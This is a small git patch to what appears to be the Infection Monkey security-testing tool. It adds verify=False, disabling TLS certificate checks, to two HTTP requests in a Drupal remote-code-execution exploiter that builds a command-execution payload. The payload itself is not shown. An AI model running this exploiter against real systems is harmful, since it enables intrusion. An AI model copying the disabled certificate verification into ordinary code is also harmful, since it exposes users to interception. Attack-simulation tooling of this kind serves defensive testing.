From 702f5c1a41fcd5aa56ad655e17ee25ed54163500 Mon Sep 17 00:00:00 2001
From: ophirharpazg <ophir.harpaz@guardicore.com>
Date: Wed, 2 Sep 2020 00:17:46 +0300
Subject: [PATCH] verify=False for HTTPS requests

---
 monkey/infection_monkey/exploit/drupal.py | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py
index f28c002c3..3a333d827 100644
--- a/monkey/infection_monkey/exploit/drupal.py
+++ b/monkey/infection_monkey/exploit/drupal.py
@@ -75,7 +75,8 @@ class DrupalExploiter(WebRCE):
 
         response = requests.get(f'{url}?_format=hal_json',
                                 json=payload,
-                                headers={"Content-Type": "application/hal+json"})
+                                headers={"Content-Type": "application/hal+json"},
+                                verify=False)
 
         if is_response_cached(response):
             LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
@@ -89,8 +90,11 @@ class DrupalExploiter(WebRCE):
         base = remove_port(url)
         payload = build_cmd_execution_payload(base, cmd)
 
-        r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
-
+        r = requests.get(f'{url}?_format=hal_json',
+                         json=payload,
+                         headers={"Content-Type": "application/hal+json"},
+                         verify=False)
+        
         if is_response_cached(r):
             LOG.info(f'Exploiting {url} returned cache HIT, may have failed')